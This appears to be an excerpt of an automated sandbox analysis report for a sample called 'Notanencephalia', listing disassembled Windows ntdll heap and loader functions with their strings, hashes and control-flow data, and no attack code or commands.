                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 1FE1635D
                                                • @, xrefs: 1FE16027
                                                • @, xrefs: 1FE161B0
                                                • @, xrefs: 1FE16277
                                                • Control Panel\Desktop, xrefs: 1FE1615E
                                                • LanguageConfiguration, xrefs: 1FE16420
                                                • InstallLanguageFallback, xrefs: 1FE16050
                                                • PreferredUILanguages, xrefs: 1FE163D1
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                • API String ID: 0-1325123933
                                                • Opcode ID: c3c82b7339e5b573c8e34accc2570025258f4a0da27923c36e5d2e94a6c918c2
                                                • Instruction ID: b06affb3bff60da0b48297d71ba750afe0717ca815e62a7851ecbad51d13aba6
                                                • Opcode Fuzzy Hash: c3c82b7339e5b573c8e34accc2570025258f4a0da27923c36e5d2e94a6c918c2
                                                • Instruction Fuzzy Hash: 1A7238B55083419BD361CF2AC840BABB7E9BFC8714F44492DF9959B250EB30E905CBA2
                                                Function 1FE20274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1298 1fe20274-1fe20296 call 1fdc7e54 1301 1fe202b5-1fe202cd call 1fd676b2 1298->1301 1302 1fe20298-1fe202b0 RtlDebugPrintTimes 1298->1302 1307 1fe202d3-1fe202e9 1301->1307 1308 1fe206f7 1301->1308 1306 1fe20751-1fe20760 1302->1306 1309 1fe202f0-1fe202f2 1307->1309 1310 1fe202eb-1fe202ee 1307->1310 1311 1fe206fa-1fe2074e call 1fe20766 1308->1311 1312 1fe202f3-1fe2030a 1309->1312 1310->1312 1311->1306 1314 1fe20310-1fe20313 1312->1314 1315 1fe206b1-1fe206ba GetPEB 1312->1315 1314->1315 1319 1fe20319-1fe20322 1314->1319 1317 1fe206d9-1fe206de call 1fd6b970 1315->1317 1318 1fe206bc-1fe206d7 GetPEB call 1fd6b970 1315->1318 1326 1fe206e3-1fe206f4 call 1fd6b970 1317->1326 1318->1326 1323 1fe20324-1fe2033b call 1fd7ffb0 1319->1323 1324 1fe2033e-1fe20351 call 1fe20cb5 1319->1324 1323->1324 1332 1fe20353-1fe2035a 1324->1332 1333 1fe2035c-1fe20370 call 1fd6758f 1324->1333 1326->1308 1332->1333 1337 1fe205a2-1fe205a7 1333->1337 1338 1fe20376-1fe20382 GetPEB 1333->1338 1337->1311 1341 1fe205ad-1fe205b9 GetPEB 1337->1341 1339 1fe203f0-1fe203fb 1338->1339 1340 1fe20384-1fe20387 1338->1340 1342 1fe20401-1fe20408 1339->1342 1343 1fe204e8-1fe204fa call 1fd827f0 1339->1343 1344 1fe203a6-1fe203ab call 1fd6b970 1340->1344 1345 1fe20389-1fe203a4 GetPEB call 1fd6b970 1340->1345 1346 1fe20627-1fe20632 1341->1346 1347 1fe205bb-1fe205be 1341->1347 1342->1343 1348 1fe2040e-1fe20417 1342->1348 1363 1fe20590-1fe2059d call 1fe211a4 call 1fe20cb5 1343->1363 1364 1fe20500-1fe20507 1343->1364 1359 1fe203b0-1fe203d1 call 1fd6b970 GetPEB 1344->1359 1345->1359 1346->1311 1349 1fe20638-1fe20643 1346->1349 1351 1fe205c0-1fe205db GetPEB call 1fd6b970 1347->1351 1352 1fe205dd-1fe205e2 call 1fd6b970 1347->1352 1355 1fe20438-1fe2043c 1348->1355 1356 1fe20419-1fe20429 1348->1356 1349->1311 1357 1fe20649-1fe20654 1349->1357 1371 1fe205e7-1fe205fb call 1fd6b970 1351->1371 1352->1371 1366 1fe2044e-1fe20454 1355->1366 1367 1fe2043e-1fe2044c call 1fda3bc9 1355->1367 1356->1355 1365 1fe2042b-1fe20435 call 1fe2dac6 1356->1365 1357->1311 1368 1fe2065a-1fe20663 GetPEB 1357->1368 1359->1343 1392 1fe203d7-1fe203eb 1359->1392 1363->1337 1372 1fe20512-1fe2051a 1364->1372 1373 1fe20509-1fe20510 1364->1373 1365->1355 1379 1fe20457-1fe20460 1366->1379 1367->1379 1376 1fe20682-1fe20687 call 1fd6b970 1368->1376 1377 1fe20665-1fe20680 GetPEB call 1fd6b970 1368->1377 1393 1fe205fe-1fe20608 GetPEB 1371->1393 1383 1fe20538-1fe2053c 1372->1383 1384 1fe2051c-1fe2052c 1372->1384 1373->1372 1399 1fe2068c-1fe206ac call 1fe186ba call 1fd6b970 1376->1399 1377->1399 1390 1fe20472-1fe20475 1379->1390 1391 1fe20462-1fe20470 1379->1391 1396 1fe2053e-1fe20551 call 1fda3bc9 1383->1396 1397 1fe2056c-1fe20572 1383->1397 1384->1383 1395 1fe2052e-1fe20533 call 1fe2dac6 1384->1395 1400 1fe20477-1fe2047e 1390->1400 1401 1fe204e5 1390->1401 1391->1390 1392->1343 1393->1311 1403 1fe2060e-1fe20622 1393->1403 1395->1383 1414 1fe20563 1396->1414 1415 1fe20553-1fe20561 call 1fd9fe99 1396->1415 1402 1fe20575-1fe2057c 1397->1402 1399->1393 1400->1401 1407 1fe20480-1fe2048b 1400->1407 1401->1343 1402->1363 1408 1fe2057e-1fe2058e 1402->1408 1403->1311 1407->1401 1409 1fe2048d-1fe20496 GetPEB 1407->1409 1408->1363 1412 1fe204b5-1fe204ba call 1fd6b970 1409->1412 1413 1fe20498-1fe204b3 GetPEB call 1fd6b970 1409->1413 1423 1fe204bf-1fe204dd call 1fe186ba call 1fd6b970 1412->1423 1413->1423 1421 1fe20566-1fe2056a 1414->1421 1415->1421 1421->1402 1423->1401
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 3446177414-1700792311
                                                • Opcode ID: 01698d9ca0a71adb9d7bfa7db32f4db1ee96789f068e3bfe2c36081d09b1d1d3
                                                • Instruction ID: ff10c9c8c607d27e922a5e297c9bbc0096a9b6bec738128f37c598c6f54ae96d
                                                • Opcode Fuzzy Hash: 01698d9ca0a71adb9d7bfa7db32f4db1ee96789f068e3bfe2c36081d09b1d1d3
                                                • Instruction Fuzzy Hash: A1D1E235500685DFCB51DF68C880AEEBFF2FF4A324F84805AE5499B691E736E945CB20
                                                Function 1FE1FD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                • API String ID: 3446177414-3492000579
                                                • Opcode ID: 8a16b103950ad26a7203428b892d8b8e757bd77a4580dad1cc0e478ef4e1fbd0
                                                • Instruction ID: d17aa9c76e9e76b8fb39e2ec8c29fef4ba2958330bf6053cccaa8e064b6e3d4f
                                                • Opcode Fuzzy Hash: 8a16b103950ad26a7203428b892d8b8e757bd77a4580dad1cc0e478ef4e1fbd0
                                                • Instruction Fuzzy Hash: 1F712735905289DFCB01DF69C880AEEFBF2FF4A324F08815AE4459F291DB35A941CB90
                                                Function 1FD9D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlDebugPrintTimes.NTDLL ref: 1FD9D959
                                                  • Part of subcall function 1FD74859: RtlDebugPrintTimes.NTDLL ref: 1FD748F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-1975516107
                                                • Opcode ID: 3da827efd846ea5d2228457b9ff793250b348aea1b6fcc4aa2ca6cc2166f9b46
                                                • Instruction ID: 48bb23ccd1ad6acbbcdc6243702b3f366c4e1c1f174b8c7b73a6f98b85702299
                                                • Opcode Fuzzy Hash: 3da827efd846ea5d2228457b9ff793250b348aea1b6fcc4aa2ca6cc2166f9b46
                                                • Instruction Fuzzy Hash: F851FE75A003499FCB84EFA4C8947EEBBB1BF49324F204159D4816B3C2D775B855CBA0
                                                Function 1FD9DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                • API String ID: 3446177414-3224558752
                                                • Opcode ID: f3d17b406ab6be506382b56117843a7abe76a6f00b8bf5ed560c45e059b324c3
                                                • Instruction ID: 79555fc9ce933b17c179be53e0ce537962564697b972c7d7277b3e6f7fcbe294
                                                • Opcode Fuzzy Hash: f3d17b406ab6be506382b56117843a7abe76a6f00b8bf5ed560c45e059b324c3
                                                • Instruction Fuzzy Hash: 56411335A10785DFC781DF64C894BBAB7B8FF41328F2085A9E4854BAD0C738B885CB91
                                                Function 1FD9DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                • API String ID: 3446177414-1222099010
                                                • Opcode ID: e4f2faf24dd20f189d531480496876187ecb97786249222dbf261995bcc709e7
                                                • Instruction ID: 38f4213b1b6570a1242678a63dd8e159972db40b8def847fa9d2ae49924a61ba
                                                • Opcode Fuzzy Hash: e4f2faf24dd20f189d531480496876187ecb97786249222dbf261995bcc709e7
                                                • Instruction Fuzzy Hash: 503145381147C4EFD792DB64C858BFA77E4FF01720F044195F8824BA91C7A9B886C761
                                                Function 1FE1F99B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                • API String ID: 0-2224505338
                                                • Opcode ID: cf07998f9cf212f616f7e88a9e6eb63cf2577215105f13b8de4be88087a7a255
                                                • Instruction ID: 038eba871c4524d21ecbdbd75ac2eae1056f1d0600d465e6622ff4c97125e6a0
                                                • Opcode Fuzzy Hash: cf07998f9cf212f616f7e88a9e6eb63cf2577215105f13b8de4be88087a7a255
                                                • Instruction Fuzzy Hash: 5151E236125284EFC751CFA5CC94FAA77E4EF09738F148126E4019F691D639EC85CBA0
                                                Function 1FD80770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: 0afe7871d3efd08256e6d4bfbc89ebe488378babf17412d7c1a54399168322d1
                                                • Instruction ID: 94c4f6369be64f62c720ade6f486b3a39b97449d008a8514f397d9162ea9b244
                                                • Opcode Fuzzy Hash: 0afe7871d3efd08256e6d4bfbc89ebe488378babf17412d7c1a54399168322d1
                                                • Instruction Fuzzy Hash: B6F1A875A00746DFEB44CF68C888BBAB7B5FF85300F148269E45A9B381D730B981CB90
                                                Function 1FD6F910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 3446177414-3610490719
                                                • Opcode ID: da6acba1c3cb38e2ed68e4c0cc0461495edc9bfa7959ba72d0f0cfa341a8e8b0
                                                • Instruction ID: edb4ceb55328872553a8ace760824541e36d7e2664ad9a748684ab1ecca5011d
                                                • Opcode Fuzzy Hash: da6acba1c3cb38e2ed68e4c0cc0461495edc9bfa7959ba72d0f0cfa341a8e8b0
                                                • Instruction Fuzzy Hash: 11911575704B81DFD395CF24C884B7EB7A5BF85724F400699E9859B280EB34F846CBA2
                                                Function 1FD99803 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 3446177414-2283098728
                                                • Opcode ID: 0c64d59a661aa22274514006041c0a69df4c163ee959298b18c8acf947039a13
                                                • Instruction ID: f9866e1ee302e14b9decce75654bc32197d851b622ac4aa599d1695900440c03
                                                • Opcode Fuzzy Hash: 0c64d59a661aa22274514006041c0a69df4c163ee959298b18c8acf947039a13
                                                • Instruction Fuzzy Hash: A851D275710343AFD794DFB4C884A7AB7A1BB84324F14062DE4969B2D1EB31B845CBA3
                                                Function 1FDF9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                • API String ID: 3446177414-3127649145
                                                • Opcode ID: 1ba3edf994c0dac551f9401478846ec62dcf72d088288b201e8729695a185577
                                                • Instruction ID: 9ce2e0bf2799b435f9124ec5c3e22fa845d97665fb6cb203f393a8665569df82
                                                • Opcode Fuzzy Hash: 1ba3edf994c0dac551f9401478846ec62dcf72d088288b201e8729695a185577
                                                • Instruction Fuzzy Hash: C4327F759013199BDBA1CF65CC88BAAB7F8FF44300F1142EAD50DA7290EB71AA85CF51
                                                Function 1FD89950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                • API String ID: 0-3393094623
                                                • Opcode ID: e41a948a7541093353a562a4a83b7399298b946dec57aac2d9a705ae8dd61366
                                                • Instruction ID: e51d042912c29ff15d0306befad0db36db9c2eb3567fad3eb08ffbb66f6adf0e
                                                • Opcode Fuzzy Hash: e41a948a7541093353a562a4a83b7399298b946dec57aac2d9a705ae8dd61366
                                                • Instruction Fuzzy Hash: 4F025B759093858BC7A1CF64C080BABBBE5BF84B14F41491EF8CA9B250E775E844CB93
                                                Function 1FE4B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: a879a1fd4e84c234975ebea963bd3a1a736a69283e138a9f30acb308125ee5e4
                                                • Instruction ID: 635889e72594a1400c2092dd23ea07e11abb1b76f208758b56e09eb10905070d
                                                • Opcode Fuzzy Hash: a879a1fd4e84c234975ebea963bd3a1a736a69283e138a9f30acb308125ee5e4
                                                • Instruction Fuzzy Hash: 53F1E972E006558FCF08CF69D9906BEFBF6AF8821472E416DD466DB381E634EA41CB50
                                                Function 1FDFFD2A Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Item:$ Language:$ Name:$SR - $Type:
                                                • API String ID: 0-3082644519
                                                • Opcode ID: f8fa0a548c4050defc76c5a0f5319aaaec63736635519e80101e565965e3100f
                                                • Instruction ID: efbdb952b5b625d3a7e538004b499b3629d7ce5d720215b6af34bccb6cfb8342
                                                • Opcode Fuzzy Hash: f8fa0a548c4050defc76c5a0f5319aaaec63736635519e80101e565965e3100f
                                                • Instruction Fuzzy Hash: 3C419572A0026C5BCB60CB64CC48FEAB7BCAF46314F5542D5E44997290DE34AE86CFA1
                                                Function 1FD9D9D0 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %ld leaks detected.$HEAP: $HEAP[%wZ]: $Inspecting leaks at process shutdown ...$No leaks detected.
                                                • API String ID: 0-1155200129
                                                • Opcode ID: d6670973bbcf48873ba4b6ae02fbf83bf01e57efc3633d74a534f0e7a21041e0
                                                • Instruction ID: 50b77144d00989b5b95dd508d6b642aff92406a06484f5c40cf7571b58791e98
                                                • Opcode Fuzzy Hash: d6670973bbcf48873ba4b6ae02fbf83bf01e57efc3633d74a534f0e7a21041e0
                                                • Instruction Fuzzy Hash: 9031B479121B85DFC391AB24C9D8F3677E4FB46630F15806AF8404F691D63AB8A1CF20
                                                Function 1FD759C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 6adc42f2d2d3767158d0ca02acf62722caaa0997071e6382bdc10c91e380fe0b
                                                • Instruction ID: e3ee3892023e1df72547a2e125d8fb008e1dfb5f8c21b5dd75fc9856e71978b9
                                                • Opcode Fuzzy Hash: 6adc42f2d2d3767158d0ca02acf62722caaa0997071e6382bdc10c91e380fe0b
                                                • Instruction Fuzzy Hash: 84326D74D043A9DFDB61CF64C944BEDBBB0BB49308F4042E9D449AB281EB756A84CF91
                                                Function 1FD7BEC0 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$.mui$.mun$SystemResources\
                                                • API String ID: 0-3047833772
                                                • Opcode ID: af15e33a476e43e12b3f771ded2b629a1f8dda1e407b762679767e676dccde02
                                                • Instruction ID: f54d2051e0c47af323055692880a400fbfbc839c383d3af48a2cab8847510ed5
                                                • Opcode Fuzzy Hash: af15e33a476e43e12b3f771ded2b629a1f8dda1e407b762679767e676dccde02
                                                • Instruction Fuzzy Hash: 8E622F76A007699FCB61CF54CC40BE9B7B8BF06314F0542E9E449AB690DB31AE85CF52
                                                Function 1FD83D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
